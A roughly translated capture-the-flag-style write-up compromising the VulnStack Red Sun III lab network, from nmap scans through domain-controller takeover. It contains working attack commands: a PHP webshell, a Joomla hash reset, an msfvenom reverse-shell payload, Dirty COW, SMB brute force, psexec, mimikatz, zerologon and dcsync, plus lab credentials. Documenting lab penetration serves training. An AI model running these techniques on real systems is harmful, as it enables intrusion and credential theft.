VulnStack-Red Sun Target Machine III
summarize
Intersecting with the previous two range environments, the difficulty of range three is still a little harder, there are a lot of rabbit holes, which tests our trade-offs and trial and error of existing information, as well as the judgment of the penetration test priority. Involved in the trial and error of database operations, the joomla framework cve fast learning, php used to disabled_function bypass, the linux kernel power lifting trade-offs, familiar with the msf framework module and learning. Including the routing setup, socks proxy use, smb service blasting, psexec horizontal, kiwi (mimikatz) use and so on. Also used crackmapexec this powerful tool.
Learning with the masters
Environment Setup
Target machine address:/vuln/detail/5/
After the download is complete, we find that all 5 hosts are hung and the accounts are logged in by default. We need to take a snapshot of the machines first
Add a piece of192.168.93.0 network segmentVMnet2 Host NIC only, with the following settings:
Here the name can only be VMnet2. If you have VMnet2, then modifying the ah network segment will be fine
On a centos host with dual NICs we have to restart the network service after booting, and the ip address of the bridged NIC in the future
sevice network restart
The other four hosts are customized host-only single NIC machines.
Setting a kali host as a bridged NIC
We've finished setting up the environment.
My kali machine.192.168.153.37
centos: 192.168.153.118,192.168.93.100
Ubantu: 192.168.93.120
Win7: 192.168.93.30
Win2012: 192.168.93.10
Win2008: 192.168.93.20
I. nmap scanning
1) Host discovery
sudo nmap -sn 192.168.153.0/24 -o hosts
MAC Address: 1E:C4:A8:26:3A:B4 (Unknown)
Nmap scan report for 192.168.153.118
Host is up.
see that192.168.153.37 is the newly added ip, which should be the centos target address.
2) Port scanning
sudo nmap -sT --min-rate 10000 -p- 192.168.153.118 -o ports
Starting Nmap 7.93 ( ) at 2024-10-01 07:00 CST
Nmap scan report for 192.168.153.118
Host is up (0.00052s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
3) Detailed information scanning
sudo nmap -sT -sV -sC -p22,80,3306 -O 192.168.153.118 -o details
Nmap scan report for 192.168.153.118
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 2584c6cc2c8a7b8f4a7c60f1a3c9b022 (DSA)
|_ 2048 58d14c592d85ae0769240add720f45a5 (RSA)
80/tcp open http nginx 1.9.4
3306/tcp open mysql?
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.|
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at /submit/ .
# Nmap done at Tue Oct 1 07:07:26 2024 -- 1 IP address (1 host up) scanned in 243.25 seconds
4) Default Script Scanning
sudo nmap --script=vuln -p22,80,3306 192.168.153.118 -o vuln
Starting Nmap 7.93 ( ) at 2024-10-01 07:11 CST
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 84.04% done; ETC: 07:12 (0:00:06 remaining)
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 89.40% done; ETC: 07:12 (0:00:04 remaining)
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.90% done; ETC: 07:12 (0:00:04 remaining)
Nmap scan report for 192.168.153.118
Host is up (0.00018s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 333.79 seconds
Seeing that you have ssh and mysql, you can try to see if there is a weak password first
hydra -C /usr/share/wordlists/legion/ mysql://192.168.153.118
Saw a set of weak passwords for mysql.
II. mysql penetration (failed)
mysql -u root -h 192.168.153.118 -p123
MySQL [(none)]> show variables like '%secure%';
+--------------------------+-------+
| Variable_name | Value |
+--------------------------+-------+
| require_secure_transport | OFF |
| secure_auth | ON |
| secure_file_priv | |
+--------------------------+-------+
3 rows in set (0.028 sec)
see thatsecure_file_priv is null, we've seen this in Red Sun Target I. Try writing a webshell to get an initial foothold.
MySQL [(none)]> show variables like '%general%';
+------------------+---------------------------+
| Variable_name | Value |
+------------------+---------------------------+
| general_log | OFF |
| general_log_file | /var/lib/mysql/ |
+------------------+---------------------------+
2 rows in set (0.002 sec)
MySQL [(none)]> set global general_log=ON;
Query OK, 0 rows affected (0.017 sec)
Having gotten this far, we run into the problem that we don't have the absolute path to the web directory
In the web service, see if there's any information about this
Try directory bursting (of course, you'll have to go through the web's 80 default pages first)
sudo gobuster dir -u http://192.168.153.118/ -w /usr/share/wordlists/dirbuster/directory-list-2. --hide-length 172
This blast didn't find the information we were looking for, so we can specify the extension to get a broader and more precise attack surface
sudo gobuster dir -u http://192.168.153.118/ -w /usr/share/wordlists/dirbuster/directory-list-2. -b 404,502 -x php,
zip,tar,txt
When letting us also choose from several different blasting tools, they are based on different algorithms that will give us unexpected gains.
-u http://192.168.153.118
Of course we have to be as thorough as possible when doing directory blasts. Try to avoid losing the easiest and most effective penetration path for yourself because you didn't collect the information properly
Eventually we found it.~This file has the absolute path we want.
With this information, it is reasonable to hypothesize that the absolute path is the/var/www/html. Of course here we have a windfall, a set of user credentials
:testuser:cvcvgjASD!@With the group credentials we can try password reuse.
1) Try into outfile
prerequisites
- secure_file_priv is null. This means that we can use mysql to write to any file in any location
Going back to mysql, let's try to execute the
select "<?php system($_GET[cmd]); ?>" into outfile "/var/www/html/"
MySQL [(none)]> select "<?php system($_GET[cmd]); ?>" into outfile "/var/www/html/";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/' (Errcode: 13 - Permission denied)
see thatPermission denied, it seems like there should still be some internal security policy. It's not going to work.
2) Try log writing
We set the output location of the log to/var/www/html/
MySQL [(none)]> set global general_log=ON;
Query OK, 0 rows affected (0.001 sec)
MySQL [(none)]> set global general_log_file="/var/www/html/";
ERROR 29 (HY000): File '/var/www/html/' not found (Errcode: 13 - Permission denied)
MySQL [(none)]> show variables like '%general%';
+------------------+--------------------------+
| Variable_name | Value |
+------------------+--------------------------+
| general_log | OFF |
| general_log_file | /var/www/html/ |
+------------------+--------------------------+
2 rows in set (0.001 sec)
As you can see, we have logging turned on, but when we change the log generation path, it generates an error.
Checking the logging configuration again, although the path was successfully modified, its logging function was also disabled
This path is still a failure
III. Web penetration
We've done the catalog blasting above, all clicked on it
Finding out that he's ajoomla cms framework, who also had a vulnerability and never licensed to RCE
cve-2023-23752:/blog/joomla-for-rce#cve-2023-23752-to-code-execution-1
Anyone who wants to know again can read this article, and of course I'll take you through the operation here. (for this range)
Found the default page, and the backend administration page/administrator
We can rummage around in the database to see if there are any user credentials
Let's go tojoomla database, you will see the am2zu_users table.
See the column names, which is a common command we use when manually injecting using sql
select column_name from information_schema.columns where table_name="am2zu_users" and table_schema="joomla";
+---------------+
| column_name |
+---------------+
| id |
| name |
| username |
| email |
| password |
| block |
| sendEmail |
| registerDate |
| lastvisitDate |
| activation |
| params |
| lastResetTime |
| resetCount |
| otpKey |
| otep |
| requireReset |
+---------------+
16 rows in set (0.006 sec)
Query user name, password
MySQL [joomla]> select id,name,username,password from am2zu_users;
+-----+------------+---------------+---------------------------------------------------
| id | name | username | password
+-----+------------+---------------+---------------------------------------------------
| 891 | Super User | administrator | $2y$10$t1RelJijihpPhL8LARC9JuM//XycrybdRbk8IEg6Dze2 |
+-----+------------+---------------+---------------------------------------------------
1 row in set (0.001 sec)
Vouchers:administrator:$2y$10$t1RelJijihpPhL8LARC9JuM//XycrybdRbk8IEg6Dze2
1) Cracking passwords
Try to crack it with hashcat.
hashcat creds /usr/share/wordlists/ --username -m 3200
hashcat creds /usr/share/wordlists/ --username -m 3200 --show
It didn't work.
2) Change password
The official joomla documentation shows how to change your password.
Documentation:/How_do_you_recover_or_reset_your_admin_password%3F
According to its Method2, we reset the password
update am2zu_users set password = "d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199" where username="administrator";
According to the official documentation, we have changed the password credentials toadministrator:secret
3) Beginning of infiltration
Login successfully and find theTemplates
Add Code
interviews
curl -X POST -d "cmd=phpinfo();" -u "administrator:secret" http://192.168.153.118/templates/beez3/ >
xdg-open
Seeing that the target php is opendisable_functions Configuration options that disable many functions for code execution
III. Gaining a foothold
we need tobypass disable_functionsThere are many ways to bypass this, here you can use Ant Sword's plugin to bypass it
Options to bypass disable_functions
Select PHP7_UserFilter for bypassing
The command can be executed normally, but theip a The command shows that this is a192.168.93.120 machine, this should be caused by the target machine doing proxy
We are in192.168.93.120 Rummaging through the more sensitive files and folders up there.
Got it./tmp/mysql/
Saw a set of credentials.wwwuser:wwwuser_123AqxTry password multiplexing. Log in to ssh.
sudo ssh [email protected] -o HostKeyAlgorithms=+ssh-rsa
Interface 3
============
Name : eth1
Hardware MAC : 00:0c:29:32:46:d3
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.93.100
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe32:46d3
IPv6 Netmask : ffff:ffff:ffff:ffff::
Gained192.168.153.118 general user privileges of the
We now have normal user privileges on both linux machines, and the192.168.153.118 is a dual NIC machine, and his other NIC is the192.168.93.100
Four, linux privileges
Because this is a target machine, it is recommended that a snapshot be taken before the lifting operation, so that the lifting operation does not cause the system to crash
Because we want to do further penetration of the intranet, and both linux machines have relatively low privileges, we need to boost them to facilitate subsequent penetration
Looking through the sudo and suid messages, there is no use for the commands that can be utilized to extract power.
[wwwuser@localhost /]$ uname -a
Linux 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
discoveries192.168.153.118 The kernel of this machine is2.6.32You can search for historical vulnerabilities on searchsploit.
searchsploit kernel | grep 2.6.32
Not much, we can try in turn
1) 9844 (Failure)
python
[+] PID.
sh: /proc//fd/1: There is no such file or directory
[+] PID.
sh: /proc//fd/1: no such file or directory
2) 10018 (Failure)
3) 25444 (Failed)
4) 24459 (Failed)
This needs to be run by someone.su - and enter the correct password for root to complete the authorization.
5) dirtycow (success)
Those familiar with the Dirty Cow vulnerability (CVE-2016-5195) should be familiar with the2.6.32 This version is sensitive because it is within the scope of the Dirty Cow vulnerability
searchsploit dirty cow -m 40839
Privileged to root
V. Intranet penetration
1) Go online msf
The msf framework integrates a variety of functions such as authorization, credentials export, port scanning, sockets proxy, etc., which facilitates subsequent intranet penetration operations.
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.153.37 lport=4444 -f elf >
Successfully uploaded to msf
2) Add intranet routing
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > show options
msf6 post(multi/manage/autoroute) > set subnet 192.168.93.0
subnet => 192.168.93.0
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run
[*] Running module against
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.93.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.153.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
3) Preliminary Intranet Detection
use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > set rhosts 192.168.93.2-254
rhosts => 192.168.93.2-254
msf6 auxiliary(scanner/discovery/udp_probe) > set threads 5
threads => 5
msf6 auxiliary(scanner/discovery/udp_probe) > run
discovered192.168.93.10,192.168.93.20,192.168.93.30 Three machines.
4) socks proxy configuration
use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > exploit -j
[*] Auxiliary module running as background job 3.
[*] Starting the SOCKS proxy server
sudo apt install proxychains
modifications/etc/ file, change it to127.0.0.1 1080
5) Host detailed port scanning
192.168.93.10
# Nmap 7.93 scan initiated Thu Oct 3 17:41:30 2024 as: nmap -o 10_win 192.168.93.10
Nmap scan report for 192.168.93.10
Host is up (1.1s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
192.168.93.20
# Nmap 7.93 scan initiated Thu Oct 3 17:42:21 2024 as: nmap -o 20_win 192.168.93.20
Nmap scan report for 192.168.93.20
Host is up (0.0030s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49158/tcp open unknown
192.168.93.30
# Nmap 7.93 scan initiated Thu Oct 3 17:40:44 2024 as: nmap -o 30_win 192.168.93.30
Nmap scan report for 192.168.93.30
Host is up (0.0022s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
Seeing that port 445 is open, try to burst the smb service
hydra
proxychains hydra -l administrator -P '/usr/share/seclists/Passwords/' smb://192.168.93.30
Of course you can also choosecrackmapexec or msf's smb module
crackmapexec
proxychains crackmapexec smb 192.168.93.30 -u administrator -p '123qwe!ASD' --local-auth
msf
use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > set smbuser administrator
smbuser => administrator
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/seclists/Passwords/
pass_file => /usr/share/seclists/Passwords/
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.30:445 - 192.168.93.30:445 - Starting SMB login bruteforce
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:/root/',
[!] 192.168.93.30:445 - No active DB -- Credential data will not be saved!
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:123456',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:password',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:12345678',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:1234',
[-] 192.168.93.30:445 - 192.168.93.30:445 - Failed: '.\administrator:pussy',
[+] 192.168.93.30:445 - 192.168.93.30:445 - Success: '.\administrator:123qwe!ASD' Administrator
[*] 192.168.93.30:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.93.30:445 - Bruteforce completed, 1 credential was successful.
[*] 192.168.93.30:445 - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
Blast to Credentialsadministrator:123qwe!ASDYou can log in to the smb service
6) Utilizing smb horizontal
use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.30
rhost => 192.168.93.30
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf6 exploit(windows/smb/psexec) > run
Successfully used smb to go online to msf, and it was system privileges
Of course trying password taking here reveals that 192.168.93.20 is also using the same password
msf6 exploit(windows/smb/psexec) > set rhost 192.168.93.20
rhost => 192.168.93.20
msf6 exploit(windows/smb/psexec) > run
[*] 192.168.93.20:445 - Connecting to the server...
[*] 192.168.93.20:445 - Authenticating to 192.168.93.20:445 as user 'administrator'...
[*] 192.168.93.20:445 - Selecting PowerShell target
[*] 192.168.93.20:445 - Executing the payload...
[+] 192.168.93.20:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.93.20:4444
[*] Sending stage (201798 bytes) to 192.168.93.20
[*] Meterpreter session 8 opened (192.168.93.100:54281 -> 192.168.93.20:4444 via session 2) at 2024-10-04 09:06:57 +0800
meterpreter >
See domain information in systeminfo
Ping it.
C:\Windows\system32>ping
ping
Pinging [192.168.93.10] with 32 bytes of data:
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Reply from 192.168.93.10: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.93.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Domain control should be192.168.93.10(modal particle intensifying preceding clause)
net view
You can see the three hosts in the domain
7) Domain Control Horizontal
Determining zerologon vulnerabilities
meterpreter > load kiwi
meterpreter > kiwi_cmd sekurlsa::logonpasswords
meterpreter > kiwi_cmd lsadump::zerologon /target: /account:WIN-8GA56TNV3MV$
target
meterpreter > kiwi_cmd lsadump::zerologon /target: /account:WIN-8GA56TNV3MV$ /exploit
Successful attack, transferring hash value
kiwi_cmd lsadump::dcsync /domain: /dc: /user:administrator /authuser:WIN-8GA56TNV3MV$ /authdomain:test /authpassword:"" /authntlm
Credentials:
Hash NTLM: 18edd0cc3227be3bf61ce198835a1d97
ntlm-0: 18edd0cc3227be3bf61ce198835a1d97
ntlm-1: c703941f8ce69a643264ac6f87955b2b
nt1m-2: 2bc31ee9ab29514308035203e98a727c
lm0: 9f8f8b3a6b02ebbc48586f9995cc6b69
lm-1: be62fe8aef5763fe44c55c5308ab9597
See domain controladministratorThe user's ntlmhash is18edd0cc3227be3bf61ce198835a1d97
Finally, recover the password of the domain control server to prevent the domain control from being derailed.
kiwi_cmd lsadump::postzerologon /target: /account:WIN-8GA56TNV3MV$
8) Conduct PTH attack (failed)
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK
meterpreter > kiwi_cmd sekurlsa::pth /user:administrator /domain: /ntlm:18edd0cc3227be3bf61ce198835a1d97
Failed here.
9) Grab from win2008
We tried password multiplexing above and found that the passwords for 2008 are the same as win7 are123qwe!ASD
Executed by meterpreter on 2008
meterpreter > load kiwi
meterpreter > creds_all
see that
There's a plaintext password for domain control up there.
Here my machine's msf is not logging into the domain control
10) Verify with crackmapexec
proxychains crackmapexec smb 192.168.93.10 -u administrator -p 'zxcASDqw123!!'
Seeing success, you can access domain control
summarize
Through nmap scanning, we found a centos web machine open to the public, and through trial and error on mysql getshell, as well as exploiting the public vulnerability cve-2023-23752 and bypass disable_functions on the web side of the joomla framework, we gained a foothold on another ubuntu machine foothold, looked for information in ubuntu, found centos credential information, and used dirtycow (dirty cow) vulnerability to lift power to root.
The use of dual-network card machine centos, build a routing agent, lateral to the intranet, blast smb service to get the password credentials Win7, while password multiplexing to get the shell of the server2008 machine, the use of mimikatz in 2008 to capture the passwords, and ultimately take down the domain control!